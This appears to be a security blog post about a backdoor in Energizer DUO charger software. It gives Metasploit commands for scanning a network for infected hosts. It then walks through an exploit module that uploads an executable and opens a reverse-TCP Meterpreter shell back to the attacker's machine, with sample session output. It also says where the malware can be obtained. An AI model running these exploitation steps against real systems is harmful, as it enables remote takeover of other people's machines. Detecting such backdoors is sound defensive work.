The newsosphere was abuzz this morning with the discovery that Energizer's "DUO" USB Battery Charger included a malicious backdoor in the accompanying software. The backdoor was only discovered after the product was discontinued, leading some to believe that it went through its entire lifecycle undetected. The good news is that the backdoor is relatively harmless: machines behind a corporate firewall, or those with a local firewall installed, should be protected from access to the listener on port 7777. The backdoor makes no outbound connections, and uninstalling the USB Charger software package clears the system.
As of this afternoon, you can now use Metasploit to locate infected systems on the local network. After downloading a copy of Metasploit and updating it to revision 8749 or newer, the following commands can be used to scan the local network:
```
$ msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
```
To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:
```
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit
[*] Started reverse handler on 192.168.0.228:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
meterpreter > getuid
Server username: XPDEV\Developer
```
A copy of the malware can be obtained from the Wayback Machine.